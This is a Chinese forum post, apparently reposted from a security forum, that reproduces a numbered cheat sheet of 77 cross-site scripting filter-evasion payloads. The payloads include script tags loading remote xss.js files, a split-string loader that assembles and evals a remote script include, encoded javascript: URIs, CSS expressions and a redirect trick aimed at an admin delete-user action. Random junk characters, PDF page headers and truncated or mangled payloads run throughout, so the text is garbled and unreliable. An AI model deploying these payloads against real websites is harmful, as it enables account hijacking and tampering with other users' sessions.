貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
6 K! e# b8 \& J$ `( `/ ](1)普通的XSS JavaScript注入
# \. M! Q s K8 c9 @<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>& \" l" \. M+ L- _- P1 ?$ u M1 {6 Y
(2)IMG标签XSS使用JavaScript命令
% e4 p" V( K) x0 L, a" ]& Q6 w<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
. r/ G/ T! k! h) {( v7 D* \(3)IMG标签无分号无引号& I x' U9 e8 |% ?6 b' v
<IMG SRC=javascript:alert(‘XSS’)>! e d9 n, L* ] x
(4)IMG标签大小写不敏感
9 U4 K( g2 C# C! U' p<IMG SRC=JaVaScRiPt:alert(‘XSS’)>' z5 X+ W% f! ?/ |
(5)HTML编码(必须有分号)
3 k) A9 o0 l9 i" |: f2 Z<IMG SRC=javascript:alert(“XSS”)>
" D; N# a1 |" b0 z! |# `+ T A( s9 j(6)修正缺陷IMG标签! o$ @! W, R& w* }, b
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>1 `2 c% i: N5 x# A" q
0 Q! Z/ Z7 b! q5 @& B- T% F* {* q: |" H7 Z n9 Y$ q& D
(7)formCharCode标签(计算器)
7 T% z9 o( Y- e* l3 O" V# {. `<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>& z5 r8 `; _: }$ d: U1 b e
(8)UTF-8的Unicode编码(计算器)
) ?( l7 a$ \) \4 `5 t<IMG SRC=jav..省略..S')>
3 f7 \* \& K6 Z" u/ c(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
) }2 L; } R- L0 b& ?3 O<IMG SRC=jav..省略..S')>
- ]2 B; b* C5 _& G, R(10)十六进制编码也是没有分号(计算器)' \( n# w4 Y& B$ L$ s( @: o5 x0 D
<IMG SRC=java..省略..XSS')>
2 [8 r0 \* i+ b- I/ m$ |(11)嵌入式标签,将Javascript分开& N1 C ?0 H7 d; t" f; A
<IMG SRC=”jav ascript:alert(‘XSS’);”>
/ e) R+ p+ L8 b: Q$ K) h# _(12)嵌入式编码标签,将Javascript分开
& a- U$ u4 L9 T. ?5 F<IMG SRC=”jav ascript:alert(‘XSS’);”>8 S0 @9 g0 `: n* v. _0 ^
(13)嵌入式换行符
8 {4 S2 Q& X, \1 C+ R<IMG SRC=”jav ascript:alert(‘XSS’);”>! o7 N- g- O. |
(14)嵌入式回车: K8 m; r2 w' y
<IMG SRC=”jav ascript:alert(‘XSS’);”>
6 Q. ~6 Z; ?, X! T7 `& {(15)嵌入式多行注入JavaScript,这是XSS极端的例子
" |6 k% a0 i8 t, C& g1 A/ B/ w3 w* d<IMG SRC=”javascript:alert(‘XSS‘)”>3 g$ y- Z0 y. ^1 R- u7 G1 o0 P
(16)解决限制字符(要求同页面)4 e# ^7 y! N( p: B
<script>z=’document.’</script>
, q- z+ U7 y7 W$ ~ T" H" K6 s<script>z=z+’write(“‘</script>! x! P: n) m* m: T, l, c& _
<script>z=z+’<script’</script>
4 s% K6 `( N* W0 t4 M8 [<script>z=z+’ src=ht’</script>
6 b9 h" ~; L2 s4 `<script>z=z+’tp://ww’</script>
% C$ ^: v9 ~% V& G+ c$ ?<script>z=z+’w.shell’</script>7 Z0 ~9 N# Q- L
<script>z=z+’.net/1.’</script>& E0 R A2 q" K" f0 w6 e
<script>z=z+’js></sc’</script>9 x! R% m5 M, G$ g- Y _
<script>z=z+’ript>”)’</script>
. B* A' ^; s) V% E2 Q# m6 \1 I<script>eval_r(z)</script>
, p# G7 w' d9 E7 F, N* E- H6 Z+ O(17)空字符12-7-1 T00LS - Powered by Discuz! Board
/ C$ Z7 D. `8 s* l0 @$ r( E6 Qhttps://www.t00ls.net/viewthread ... table&tid=15267 2/61 m5 l: G* w- {7 a, h
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out2 C5 |+ t+ W! C# r" ?
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用( {8 y" {, Z" U) V; f: ]
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out' Z7 r6 A( _& f9 Z8 N
(19)Spaces和meta前的IMG标签
3 Y3 B* ?1 _2 c0 k; G<IMG SRC=” javascript:alert(‘XSS’);”>
: J7 R; F1 V2 p. W% u7 |(20)Non-alpha-non-digit XSS% a( G. D& E5 O
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT> I8 |- n- z) N5 z% v. k
(21)Non-alpha-non-digit XSS to 25 n$ G5 A/ H$ ]$ N6 K+ b' s+ ~
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>3 o- D" @* y1 C& h0 F
(22)Non-alpha-non-digit XSS to 3
( N8 S2 M% s$ ^/ P( |/ v<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
- v* h& s* Z1 U a" K& t8 O+ s7 H! o(23)双开括号
! \8 U6 h% t" X# h0 I<<SCRIPT>alert(“XSS”);//<</SCRIPT>
! e7 U5 c i/ o0 w. }(24)无结束脚本标记(仅火狐等浏览器)* G% M4 r1 D, D5 Q, N. T( l A
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>3 A7 [$ z% A0 a g0 ]# `
(25)无结束脚本标记2
0 S( V* f J5 q; L<SCRIPT SRC=//3w.org/XSS/xss.js>
9 H& a/ k3 p/ h$ i" u5 w: G(26)半开的HTML/JavaScript XSS
. i. f0 \5 n/ K8 S<IMG SRC=”javascript:alert(‘XSS’)”# r5 i* N% v0 Y' A! ?
(27)双开角括号5 c- O$ T! j/ N3 O
<iframe src=http://3w.org/XSS.html <
" ?8 R3 J9 |5 u% @5 q1 O" p6 ?(28)无单引号 双引号 分号& ~% g# ~" Z' j' h! K1 m
<SCRIPT>a=/XSS/
5 `+ }: s* ]: h! E( }; K/ Dalert(a.source)</SCRIPT>! ~7 E. O; @- k' w4 i
(29)换码过滤的JavaScript( c# x4 l0 J1 W% X% m: _
\”;alert(‘XSS’);//
. h7 s5 A- r) N( W* O(30)结束Title标签# k* f/ N3 [! T- T
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>+ H2 K i6 W( {6 {, m
(31)Input Image
9 M, f- L. J* n7 D1 {- r J. H) f l<INPUT SRC=”javascript:alert(‘XSS’);”>! x3 l! L7 T. i. _7 \) E4 p
(32)BODY Image
@! o1 ?# {& }/ w<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
R3 s A1 ^ X/ Q; M7 T(33)BODY标签+ [2 v" G3 }! }4 s0 ]( S
<BODY(‘XSS’)>
: o Z6 W1 y3 a# G. Y(34)IMG Dynsrc
0 S7 Y8 A2 x# w4 K x<IMG DYNSRC=”javascript:alert(‘XSS’)”>
5 J+ w. @ l+ i- b0 r3 Q* C(35)IMG Lowsrc" Z2 e0 ^" @* Q: J$ l9 I
<IMG LOWSRC=”javascript:alert(‘XSS’)”>5 b; ^' \% h: [7 b+ a1 W. u; t" D1 c
(36)BGSOUND
( h ]" ~" G9 |6 R. }<BGSOUND SRC=”javascript:alert(‘XSS’);”>
5 d7 Q" p4 u' v% f(37)STYLE sheet
' y0 L- Z5 x2 u B- ?, O7 n& \; P<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>: i+ f' J3 X* _# r6 m/ M& c/ b4 {
(38)远程样式表# g8 G4 u& p! [& M
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
. {8 f' f4 t. E# I9 e, R(39)List-style-image(列表式)( a7 ~" s6 z v0 L T" Z4 O7 H
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS4 z; ` v! e, h: Q
(40)IMG VBscript" C% x0 o% a% X/ T5 a3 l) b
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
5 [! B& ]7 R/ P3 Y* N6 D(41)META链接url2 E- F* N: s; k+ E8 \
1 ~, `/ T" p/ \- a
7 \9 ^& j3 f$ h<META HTTP-EQUIV=”refresh” CONTENT=”0;
" S- O0 M* {. EURL=http://;URL=javascript:alert(‘XSS’);”>
* y2 Y: R# F/ k(42)Iframe
# E$ ]) ~) N6 n. m+ {: x<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
% G1 e! h7 L) i4 ~$ R; p1 u1 \(43)Frame
, Y6 J4 G; E- @6 a<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
6 j/ g5 f) T/ }0 Hhttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
- H7 E2 f4 R5 V# a(44)Table
: Q7 |4 \+ y& @, f<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>6 d8 n) ^3 [. y$ Y
(45)TD' s+ g! J' E4 [- Z8 e; h2 r
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>5 \$ F* B* P' Y6 [
(46)DIV background-image
# Q8 p' q" R/ o6 [# K8 `* p<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>% t7 W U- ~% E+ I
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
; Q' O; y6 K5 O' G/ n- z+ a }8&13&12288&65279)4 g' J! g: a; Y8 ]6 q
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>- C; B4 j" |% K$ I+ }. V
(48)DIV expression5 U1 H# [2 z* R& B
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>1 u) ^# @* h' i0 f, u! U0 H; Y
(49)STYLE属性分拆表达, \1 x, t. h7 U; |% ]( {
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”># ~5 P, @. F# w' T: d
(50)匿名STYLE(组成:开角号和一个字母开头)! J1 b4 ?! {4 M1 h* f5 m, Q6 w
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
" H$ m/ [) L9 |) K$ }* q(51)STYLE background-image9 C8 ^& C0 u" P0 F( s V: D4 p
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A# c6 s3 N1 k5 T
CLASS=XSS></A>) |3 O( ]+ [9 V" Z( R- ~
(52)IMG STYLE方式
. B! Y; f* P& X- dexppression(alert(“XSS”))’>$ Z. g/ B; j/ u( h
(53)STYLE background
" f# I; A$ K% Y, a<STYLE><STYLE
1 P/ S; T% Z+ J3 Atype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
8 ?2 V, ?0 N1 ?% M5 ?: x(54)BASE5 z- e0 D% p9 z; u# e2 K
<BASE HREF=”javascript:alert(‘XSS’);//”>) v' X" s0 [4 w/ \( X
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS6 I+ o2 M( R7 R0 x1 z
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>" Q! `- Y# A+ k, j4 ^1 T
(56)在flash中使用ActionScrpt可以混进你XSS的代码8 ^) i/ W/ u. G; Q5 q% i! L# e
a=”get”;
& ?' T! r* Y4 B2 _2 J1 f/ nb=”URL(\”";! H6 c ], R8 s1 _1 K ^
c=”javascript:”;! [! F# v7 L9 a. {5 k: z
d=”alert(‘XSS’);\”)”;+ J5 y6 K+ w' b( Y5 [; r3 p) ?
eval_r(a+b+c+d);+ U6 w9 `8 }; x) K# u9 p
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上: ]- U( _+ A1 [2 s
<HTML xmlns:xss>
. L5 I$ t: p3 b' u/ x" W<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>7 h6 [, }: U7 V
<xss:xss>XSS</xss:xss>
+ Y/ \% g7 R9 ]6 t% z# {1 g</HTML>
) C K8 Q5 b) t% A; r(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
: N* V- \( p' @<SCRIPT SRC=””></SCRIPT>) b0 K, y5 R' R9 g: v
(59)IMG嵌入式命令,可执行任意命令
9 P9 P- T3 T5 H$ h l& u+ [! P<IMG SRC=”http://www.XXX.com/a.php?a=b”>
- e3 W: G) f& I8 I: d6 ~* x q/ T(60)IMG嵌入式命令(a.jpg在同服务器)
/ K3 s& u* ~8 x8 K: eRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser! r& ]9 c! r" Y
(61)绕符号过滤' E; h! m2 [. m5 c
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>: E8 A/ L% s* m; x
(62)3 \' U8 `. k& n# \
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
2 j' A' q) S# W, n9 l(63)" v4 V* ?3 \' S) q; x, e7 K
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>- L! o9 s7 X8 Y$ x2 l8 E. a
(64)
& Y6 D' f. _3 l% y- z2 T<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>0 Z) E3 n( r( L- a
(65)
0 W" f4 B; L! C, r<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>5 k, {6 A8 Y; ]& ~% T+ u3 M$ a
(66)12-7-1 T00LS - Powered by Discuz! Board
9 ~" ?+ @! \4 m, v4 A8 Fhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6! ?/ \+ u5 ]9 Z
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>+ R" k V- X' X+ D/ \
(67)
! S: p/ i2 l6 s1 a: J6 v% u<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
/ y( l! p* Z4 r8 g+ [$ M</SCRIPT>7 Z9 ]* K& p% ~5 w
(68)URL绕行
/ w9 w; T1 P2 T<A HREF=”http://127.0.0.1/”>XSS</A>
5 ?: N' d/ e2 x" B: P2 m) K(69)URL编码& i) y7 I* p0 f# y: x4 |- e7 F
<A HREF=”http://3w.org”>XSS</A>$ v, a+ P9 E4 H
(70)IP十进制
, A. r5 I2 ?8 ~/ \- M<A HREF=”http://3232235521″>XSS</A>
" `* C* S2 v+ b+ { ^; N) W r(71)IP十六进制
* _) c3 f1 w7 {" M% Y3 P$ U9 c<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>& b }9 H% | B& E2 v
(72)IP八进制
( X3 H4 j- O+ u3 v7 w9 x& w<A HREF=”http://0300.0250.0000.0001″>XSS</A>
- x" ?/ O8 D* ^(73)混合编码- O# s' m! T. W1 S& p" b6 y
<A HREF=”h6 {1 X- f0 K1 E
tt p://6 6.000146.0×7.147/”">XSS</A>2 D: Z" }8 \4 F8 F& ~$ q& e
(74)节省[http:]
; u) F1 ]2 |' j' }) g<A HREF=”//www.google.com/”>XSS</A>- V7 y0 J. R/ V% n
(75)节省[www]
1 ^3 Z. x+ u/ M9 t! g7 s- ?( D<A HREF=”http://google.com/”>XSS</A>0 s7 O8 }; \. d+ L' V
(76)绝对点绝对DNS% A4 |; s. Z7 l& e& X. P
<A HREF=”http://www.google.com./”>XSS</A>
7 J( s+ M, b( c0 K(77)javascript链接! [* D/ N/ f* y# v( f: I
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>. x( K5 R4 o- q2 \
$ P7 ~; |5 K* z' ?# b原文地址:http://fuzzexp.org/u/0day/?p=145 A, j* _8 o) [+ h# h/ q" X3 [
5 F6 Z+ h& w' V7 u; Q; X7 s |
发表于 2013-4-19 19:22:37
收藏
支持
反对